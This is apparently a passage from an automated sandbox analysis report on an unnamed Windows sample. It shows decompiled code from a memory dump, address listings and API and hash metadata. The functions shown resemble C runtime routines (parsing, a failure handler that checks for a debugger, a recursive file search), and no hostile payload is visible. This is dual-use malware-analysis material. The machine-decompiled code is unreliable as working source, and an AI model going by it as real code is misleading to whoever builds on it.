											goto L36;
										}
									}
									__eflags = _t536 - 5;
									if(_t536 != 5) {
										goto L115;
									} else {
										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
										_t651 =  *(_t518 + 0x4598);
										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
										_t628 = _t651 >> 0x00000001 & 0x00000001;
										_t638 = _t651 >> 0x00000003 & 0x00000001;
										 *(_t518 + 0x45ad) = _t628;
										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x45af) = _t638;
										__eflags = _t628;
										if(_t628 != 0) {
											 *((intOrPtr*)(_t518 + 0x45a4)) = E00D7C29E(_t698 + 0x24);
										}
										__eflags =  *(_t518 + 0x45af);
										if( *(_t518 + 0x45af) != 0) {
											_t505 = E00D7C269(_t698 + 0x24) & 0x0000ffff;
											 *(_t518 + 0x45a8) = _t505;
											 *(_t518 + 0x6cd8) = _t505;
										}
										goto L121;
									}
								}
								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00D71EF8(_t518);
							L133:
							E00D7159C(_t698 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
							return  *((intOrPtr*)(_t698 + 0x1c));
						}
					}
					L8:
					E00D73DAB(_t518, _t638);
					goto L133;
				}
				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
				asm("adc eax, ecx");
				_t707 =  *(_t518 + 0x6ca4);
				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
					goto L6;
				} else {
					 *((char*)(_t698 + 0x5f)) = 1;
					E00D73C40(_t518);
					_push(8);
					_push(_t698 + 0x14);
					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
						goto L8;
					} else {
						_t697 = _t518 + 0x1024;
						E00D7607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
						goto L7;
					}
				}
			}



















































































              0x00d72692
              0x00d7269b
              0x00d726a5
              0x00d726ac
              0x00d726b3
              0x00d726b6
              0x00d726bf
              0x00d726c2
              0x00d726c5
              0x00d726cc
              0x00d72734
              0x00d72734
              0x00d72737
              0x00d7273b
              0x00d72744
              0x00d72760
              0x00d72766
              0x00d72775
              0x00d7277d
              0x00d72783
              0x00d7278e
              0x00d72799
              0x00d7279c
              0x00d727a2
              0x00d727a8
              0x00d727aa
              0x00d727b8
              0x00d727b8
              0x00d727bb
              0x00d727f0
              0x00d727bd
              0x00d727bd
              0x00d727bd
              0x00d727c0
              0x00d727e4
              0x00d727c2
              0x00d727c2
              0x00d727c2
              0x00d727c5
              0x00d727d8
              0x00d727c7
              0x00d727c7
              0x00d727ca
              0x00d727cc
              0x00d727cc
              0x00d727ca
              0x00d727c5
              0x00d727c0
              0x00d727fa
              0x00d72800
              0x00d72806
              0x00d72809
              0x00d7280f
              0x00d72812
              0x00d7281d
              0x00d72820
              0x00d72821
              0x00d72824
              0x00d72844
              0x00d7284a
              0x00d72850
              0x00d72853
              0x00d72859
              0x00d7285c
              0x00d7285f
              0x00d72f78
              0x00d72f80
              0x00d72f87
              0x00d72f8e
              0x00d72f9b
              0x00d72fad
              0x00d72fb2
              0x00d72fb8
              0x00d72fca
              0x00d72fd0
              0x00d72fdd
              0x00d72fea
              0x00d72ff7
              0x00d72ffd
              0x00d72fff
              0x00d7300c
              0x00d7300e
              0x00d7300e
              0x00d7300f
              0x00d7300f
              0x00d7301b
              0x00d7302b
              0x00d7302b
              0x00d7302e
              0x00d73034
              0x00d7303a
              0x00d7303c
              0x00d7303d
              0x00d73042
              0x00d7304a
              0x00d73050
              0x00d730d9
              0x00d730dc
              0x00000000
              0x00d730dc
              0x00d73056
              0x00d7305c
              0x00d7305f
              0x00000000
              0x00000000
              0x00d73061
              0x00d73064
              0x00000000
              0x00000000
              0x00d73066
              0x00d73069
              0x00d730ab
              0x00d730b2
              0x00d730b9
              0x00d730be
              0x00d730c2
              0x00000000
              0x00000000
              0x00d730cb
              0x00d730d0
              0x00000000
              0x00d730d0
              0x00d7306b
              0x00d73072
              0x00000000
              0x00000000
              0x00d7307f
              0x00d7307f
              0x00d73082
              0x00d73088
              0x00d7308b
              0x00d7308f
              0x00d73091
              0x00d73098
              0x00d7309c
              0x00d7309f
              0x00d730a2
              0x00d730a2
              0x00d730a2
              0x00d730a7
              0x00d730a9
              0x00000000
              0x00000000
              0x00000000
              0x00d730a9
              0x00d73001
              0x00d73003
              0x00d7300a
              0x00000000
              0x00000000
              0x00000000
              0x00d7300a
              0x00d72865
              0x00d72f4e
              0x00d72f4e
              0x00d72f58
              0x00d72f66
              0x00d72f6c
              0x00d72f6c
              0x00000000
              0x00d72f58
              0x00d7286b
              0x00d7286e
              0x00d72902
              0x00d7290a
              0x00d72919
              0x00d7291d
              0x00d72920
              0x00d72927
              0x00d72930
              0x00d72932
              0x00d72936
              0x00d7293c
              0x00d72941
              0x00d7294d
              0x00d7295a
              0x00d72967
              0x00d7296d
              0x00d72970
              0x00d7297d
              0x00d7297d
              0x00d7297d
              0x00d7297f
              0x00d72981
              0x00d72981
              0x00d72987
              0x00d7298a
              0x00d72996
              0x00d72996
              0x00d72998
              0x00d72998
              0x00d729a3
              0x00d729a5
              0x00d729aa
              0x00d729b0
              0x00d729b6
              0x00d729bf
              0x00d729cf
              0x00d729cf
              0x00d729b8
              0x00d729b8
              0x00d729ba
              0x00d729ba
              0x00d729d1
              0x00d729e7
              0x00d729ed
              0x00d729fb
              0x00d72a06
              0x00d72a11
              0x00d72a14
              0x00d72a26
              0x00d72a34
              0x00d72a3f
              0x00d72a4f
              0x00d72a5d
              0x00d72a60
              0x00d72a65
              0x00d72a68
              0x00d72a6b
              0x00d72a6e
              0x00d72a71
              0x00d72a73
              0x00d72a75
              0x00d72a77
              0x00d72a77
              0x00d72a75
              0x00d72a80
              0x00d72a86
              0x00d72a8c
              0x00d72ad1
              0x00d72ad1
              0x00d72ad4
              0x00d72ade
              0x00d72ae0
              0x00d72af2
              0x00d72af2
              0x00d72afc
              0x00d72afc
              0x00d72b02
              0x00d72b04
              0x00d72b0e
              0x00d72b13
              0x00d72b15
              0x00d72b17
              0x00d72b21
              0x00d72b21
              0x00d72b13
              0x00d72b28
              0x00d72b2b
              0x00d72b37
              0x00d72b37
              0x00000000
              0x00d72b2d
              0x00d72b2d
              0x00d72b30
              0x00000000
              0x00000000
              0x00d72b34
              0x00d72b39
              0x00d72b39
              0x00d72b45
              0x00d72b45
              0x00d72b47
              0x00d72b4d
              0x00d72b7b
              0x00d72b7f
              0x00d72b81
              0x00d72b83
              0x00d72b83
              0x00d72b83
              0x00d72b86
              0x00d72b86
              0x00d72b91
              0x00d72b97
              0x00d72b9e
              0x00d72ba4
              0x00d72ba6
              0x00d72bac
              0x00d72bb3
              0x00d72bb9
              0x00d72bc0
              0x00d72bc6
              0x00d72bc6
              0x00d72bcc
              0x00d72bcf
              0x00d72bd4
              0x00d72bd7
              0x00d72bd9
              0x00d72bdb
              0x00d72bdd
              0x00d72bdd
              0x00d72beb
              0x00d72bf0
              0x00d72bf2
              0x00d72bf6
              0x00d72bfd
              0x00d72c7e
              0x00d72c88
              0x00d72c93
              0x00d72c96
              0x00d72c9d
              0x00d72c9f
              0x00d72c9f
              0x00d72c9f
              0x00d72ca2
              0x00d72ca4
              0x00d72da6
              0x00d72caa
              0x00d72cb3
              0x00d72cb6
              0x00d72cc5
              0x00d72ccf
              0x00d72cd3
              0x00d72cda
              0x00d72cdc
              0x00d72ce2
              0x00d72ce9
              0x00d72cf2
              0x00d72cf8
              0x00d72cf9
              0x00d72d05
              0x00d72d09
              0x00d72d0f
              0x00d72d11
              0x00d72d19
              0x00d72d1f
              0x00d72d21
              0x00d72d2b
              0x00d72d2d
              0x00d72d38
              0x00d72d40
              0x00d72d5d
              0x00d72d6d
              0x00d72d73
              0x00d72d76
              0x00d72d81
              0x00d72d89
              0x00d72d8e
              0x00d72d91
              0x00d72d94
              0x00d72d97
              0x00d72d99
              0x00d72d9b
              0x00d72d9e
              0x00d72d9e
              0x00d72d99
              0x00d72ce9
              0x00d72cdc
              0x00d72daf
              0x00d72db6
              0x00d72db8
              0x00d72dba
              0x00d72dba
              0x00d72bff
              0x00d72c01
              0x00d72c04
              0x00d72c07
              0x00d72c0e
              0x00d72c13
              0x00d72c1f
              0x00d72c24
              0x00d72c27
              0x00d72c29
              0x00d72c2b
              0x00d72c3e
              0x00d72c48
              0x00d72c48
              0x00d72c4d
              0x00d72c4d
              0x00d72c4d
              0x00d72c4f
              0x00d72c52
              0x00d72c54
              0x00d72c56
              0x00d72c5b
              0x00d72c62
              0x00d72c63
              0x00d72c63
              0x00d72c6b
              0x00d72c6b
              0x00d72dc1
              0x00d72dc8
              0x00d72dd6
              0x00d72dd6
              0x00d72de4
              0x00d72de9
              0x00d72df0
              0x00d72ed4
              0x00d72ef5
              0x00d72efe
              0x00d72f0a
              0x00d72f10
              0x00d72f18
              0x00d72f1a
              0x00d72f27
              0x00d72f2e
              0x00d72f33
              0x00d72f37
              0x00d72f44
              0x00d72f44
              0x00d72f37
              0x00000000
              0x00d72df6
              0x00d72df9
              0x00d72e07
              0x00d72e10
              0x00d72e19
              0x00d72e1c
              0x00d72e1e
              0x00d72e20
              0x00d72e23
              0x00d72e25
              0x00d72e28
              0x00d72e2b
              0x00d72e2d
              0x00d72e35
              0x00d72e37
              0x00d72e3a
              0x00000000
              0x00000000
              0x00d72e40
              0x00d72e45
              0x00000000
              0x00000000
              0x00d72e47
              0x00d72e49
              0x00d72e58
              0x00d72e58
              0x00d72e65
              0x00d72e6a
              0x00d72e6d
              0x00d72e6f
              0x00d72e6f
              0x00d72e6f
              0x00d72e6f
              0x00d72e72
              0x00d72e74
              0x00d72e77
              0x00d72e77
              0x00d72e7a
              0x00d72eab
              0x00d72eab
              0x00d72eab
              0x00d72eb2
              0x00d72eb9
              0x00d72ebe
              0x00d72e7c
              0x00d72e7e
              0x00d72e81
              0x00d72e81
              0x00d72e84
              0x00d72e87
              0x00d72e89
              0x00d72e96
              0x00d72e98
              0x00d72e9e
              0x00d72ea0
              0x00d72ea3
              0x00d72ea3
              0x00d72ea3
              0x00d72ea8
              0x00000000
              0x00d72ea8
              0x00d72ec1
              0x00d72ec1
              0x00d72ec2
              0x00d72ec5
              0x00d72ec5
              0x00d72ece
              0x00d72ed1
              0x00000000
              0x00d72ed1
              0x00d72df0
              0x00d72b5a
              0x00d72b5c
              0x00d72b61
              0x00d72b65
              0x00d72b67
              0x00d72b75
              0x00d72b77
              0x00000000
              0x00d72b77
              0x00d72b69
              0x00d72b6c
              0x00000000
              0x00000000
              0x00d72b70
              0x00000000
              0x00d72b71
              0x00d72b2b
              0x00d72ae2
              0x00d72ae4
              0x00000000
              0x00000000
              0x00d72ae6
              0x00d72ae8
              0x00d72aea
              0x00d72aea
              0x00000000
              0x00d72a8e
              0x00d72a8e
              0x00d72a8e
              0x00d72a91
              0x00d72ac7
              0x00000000
              0x00d72ac7
              0x00d72a94
              0x00d72a94
              0x00d72a97
              0x00d72abb
              0x00000000
              0x00d72abb
              0x00d72a99
              0x00d72a99
              0x00d72a9c
              0x00d72aaf
              0x00d72aaf
              0x00000000
              0x00d72aaf
              0x00d72a9e
              0x00d72aa1
              0x00000000
              0x00000000
              0x00d72aa3
              0x00000000
              0x00d72aa3
              0x00d72a8c
              0x00d7298c
              0x00d7298f
              0x00000000
              0x00000000
              0x00d72993
              0x00000000
              0x00d72993
              0x00d72972
              0x00d72975
              0x00000000
              0x00d72977
              0x00d72977
              0x00d72979
              0x00000000
              0x00d72979
              0x00d72975
              0x00d72874
              0x00d72877
              0x00000000
              0x00d7287d
              0x00d72889
              0x00d72891
              0x00d72899
              0x00d728a8
              0x00d728b0
              0x00d728b3
              0x00d728b9
              0x00d728bf
              0x00d728c5
              0x00d728c7
              0x00d728d1
              0x00d728d1
              0x00d728d7
              0x00d728de
              0x00d728ec
              0x00d728ef
              0x00d728f5
              0x00d728f5
              0x00000000
              0x00d728de
              0x00d72877
              0x00d72814
              0x00d7281b
              0x00000000
              0x00000000
              0x00000000
              0x00d7281b
              0x00d7280b
              0x00d7280b
              0x00000000
              0x00d727ac
              0x00d727ae
              0x00d730df
              0x00d730e2
              0x00d730f0
              0x00d730fb
              0x00d730fb
              0x00d727aa
              0x00d72746
              0x00d72748
              0x00000000
              0x00d72748
              0x00d726d6
              0x00d726d8
              0x00d726da
              0x00d726e0
              0x00000000
              0x00d726ec
              0x00d726ee
              0x00d726f2
              0x00d726fc
              0x00d726fe
              0x00d72707
              0x00000000
              0x00d72709
              0x00d72719
              0x00d7272a
              0x00d7272f
              0x00000000
              0x00d7272f
              0x00d72707

              APIs
              • __EH_prolog.LIBCMT ref: 00D7269B
              • _strlen.LIBCMT ref: 00D72C1F
                • Part of subcall function 00D80FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D7B312,00000000,?,?,?,000F01D2), ref: 00D80FFA
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D72D76
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
              • String ID: CMT
              • API String ID: 1706572503-2756464174
              • Opcode ID: 7a6549ebdac0fc072de272600b0280249329b41e58e128655f972308e22c7ad1
              • Instruction ID: ca2abccd7ffc5a19569e2646193781fc91a715be3e7c0f44f95878cc6d2695b5
              • Opcode Fuzzy Hash: 7a6549ebdac0fc072de272600b0280249329b41e58e128655f972308e22c7ad1
              • Instruction Fuzzy Hash: 1862B0716102848FDB28DF78C8956FA3BE1EF54304F08857EED9E9B286E6709945CB70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D97BE1, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E00D97BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xdad668; // 0x9e43e7e4
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00D8E690(_t41);
					_pop(_t61);
				}
				E00D8E920(_t66,  &_v804, 0, 0x50);
				E00D8E920(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00D8E690(_t57);
				}
				return E00D8E203(_t57, _v8 ^ _t69);
			}





































              0x00d97be1
              0x00d97be1
              0x00d97be1
              0x00d97be1
              0x00d97bec
              0x00d97bf1
              0x00d97bf3
              0x00d97bfb
              0x00d97bfd
              0x00d97c00
              0x00d97c05
              0x00d97c05
              0x00d97c11
              0x00d97c24
              0x00d97c32
              0x00d97c38
              0x00d97c3e
              0x00d97c44
              0x00d97c4a
              0x00d97c50
              0x00d97c56
              0x00d97c5c
              0x00d97c62
              0x00d97c68
              0x00d97c6f
              0x00d97c76
              0x00d97c7d
              0x00d97c84
              0x00d97c8b
              0x00d97c92
              0x00d97c93
              0x00d97c9c
              0x00d97ca2
              0x00d97ca2
              0x00d97ca5
              0x00d97cab
              0x00d97cb8
              0x00d97cc1
              0x00d97cca
              0x00d97cd3
              0x00d97ce1
              0x00d97ce3
              0x00d97ce9
              0x00d97cf8
              0x00d97d04
              0x00d97d07
              0x00d97d0c
              0x00d97d1b

              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D97CD9
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D97CE3
              • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00D97CF0
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: f7ca9605ad791b40cd3cda00010f73cd5e1b316a585c8ca8a9fffa977b26a341
              • Instruction ID: 4da42054ad51699ed359c70c5e2e655b0f47a3825f0e447f105bc00d51c2c0a9
              • Opcode Fuzzy Hash: f7ca9605ad791b40cd3cda00010f73cd5e1b316a585c8ca8a9fffa977b26a341
              • Instruction Fuzzy Hash: 4C31B2749113189BCB61EF68D889B9CBBB8BF08310F5045DAE41CA7250E7709B818F64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D99FD3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E00D99FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t104 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t110 = E00D97B1B(_t84, _t77, 1);
					_pop(_t86);
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t104;
						_t40 = E00D9DD71(_t86, _t110 + _t104, _t77, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00D9A212(_a16, _t100, __eflags, _t110);
							E00D97A50(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t104);
						_t74 = E00D9DD71(_t86, _t110, _t77, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00D97DBB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0xdad668; // 0x9e43e7e4
							_v48 = _t43 ^ _t117;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t110);
							_t111 = _v332.cAlternateFileName;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00D9DDC0(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E00D8E920(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00D99FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00D95030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00D99E2B);
									}
								} else {
									_push(_t55);
									_t57 = E00D99FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									FindClose(_t112);
								}
								_t58 = _t105;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t111);
									_t58 = E00D99FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
								}
							}
							__eflags = _v12 ^ _t117;
							return E00D8E203(_t58, _v12 ^ _t117);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}
















































              0x00d99fd8
              0x00d99fd9
              0x00d99fdc
              0x00d99fdc
              0x00d99fdf
              0x00d99fdf
              0x00d99fe1
              0x00d99fe2
              0x00d99feb
              0x00d99fec
              0x00d99fef
              0x00d99ff2
              0x00d99ff7
              0x00d99ffe
              0x00d99fff
              0x00d9a000
              0x00d9a003
              0x00d9a00d
              0x00d9a010
              0x00d9a011
              0x00d9a013
              0x00d9a027
              0x00d9a027
              0x00d9a02a
              0x00d9a034
              0x00d9a039
              0x00d9a03c
              0x00d9a03e
              0x00000000
              0x00d9a040
              0x00d9a044
              0x00d9a04d
              0x00d9a053
              0x00000000
              0x00d9a056
              0x00d9a015
              0x00d9a015
              0x00d9a01b
              0x00d9a020
              0x00d9a023
              0x00d9a025
              0x00d9a05c
              0x00d9a05e
              0x00d9a05f
              0x00d9a060
              0x00d9a061
              0x00d9a062
              0x00d9a063
              0x00d9a068
              0x00d9a06c
              0x00d9a06e
              0x00d9a074
              0x00d9a07b
              0x00d9a07e
              0x00d9a081
              0x00d9a082
              0x00d9a085
              0x00d9a086
              0x00d9a089
              0x00d9a08a
              0x00d9a0ab
              0x00d9a0ab
              0x00d9a0ad
              0x00000000
              0x00000000
              0x00d9a092
              0x00d9a094
              0x00d9a096
              0x00d9a098
              0x00d9a09a
              0x00d9a09c
              0x00d9a09e
              0x00d9a0a9
              0x00000000
              0x00d9a0a9
              0x00d9a09e
              0x00d9a09a
              0x00000000
              0x00d9a096
              0x00d9a0af
              0x00d9a0b1
              0x00d9a0b4
              0x00d9a0cd
              0x00d9a0cd
              0x00d9a0cf
              0x00d9a0d2
              0x00d9a0e2
              0x00d9a0e4
              0x00d9a0e4
              0x00d9a0d4
              0x00d9a0d4
              0x00d9a0d7
              0x00000000
              0x00d9a0d9
              0x00d9a0d9
              0x00d9a0dc
              0x00000000
              0x00d9a0de
              0x00d9a0de
              0x00d9a0de
              0x00d9a0dc
              0x00d9a0d7
              0x00d9a0ea
              0x00d9a0f2
              0x00d9a0f6
              0x00d9a104
              0x00d9a109
              0x00d9a11e
              0x00d9a120
              0x00d9a126
              0x00d9a129
              0x00d9a15b
              0x00d9a15b
              0x00d9a15d
              0x00d9a160
              0x00d9a166
              0x00d9a166
              0x00d9a16d
              0x00d9a187
              0x00d9a187
              0x00d9a196
              0x00d9a19b
              0x00d9a19e
              0x00d9a1a0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9a16f
              0x00d9a16f
              0x00d9a175
              0x00d9a177
              0x00000000
              0x00d9a179
              0x00d9a179
              0x00d9a17c
              0x00000000
              0x00d9a17e
              0x00d9a17e
              0x00d9a185
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9a185
              0x00d9a17c
              0x00d9a177
              0x00000000
              0x00d9a1a2
              0x00d9a1aa
              0x00d9a1b0
              0x00d9a1b2
              0x00d9a1b2
              0x00d9a1ba
              0x00d9a1bf
              0x00d9a1c7
              0x00d9a1ca
              0x00d9a1cc
              0x00d9a1e0
              0x00d9a1e5
              0x00d9a12b
              0x00d9a12b
              0x00d9a12f
              0x00d9a137
              0x00d9a137
              0x00d9a137
              0x00d9a139
              0x00d9a13c
              0x00d9a13f
              0x00d9a13f
              0x00d9a145
              0x00d9a0b6
              0x00d9a0b9
              0x00d9a0bb
              0x00000000
              0x00d9a0bd
              0x00d9a0bd
              0x00d9a0c3
              0x00d9a0c8
              0x00d9a0bb
              0x00d9a14c
              0x00d9a157
              0x00000000
              0x00000000
              0x00000000
              0x00d9a025
              0x00d99ff9
              0x00d99ffb
              0x00d9a057
              0x00d9a05b
              0x00d9a05b
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
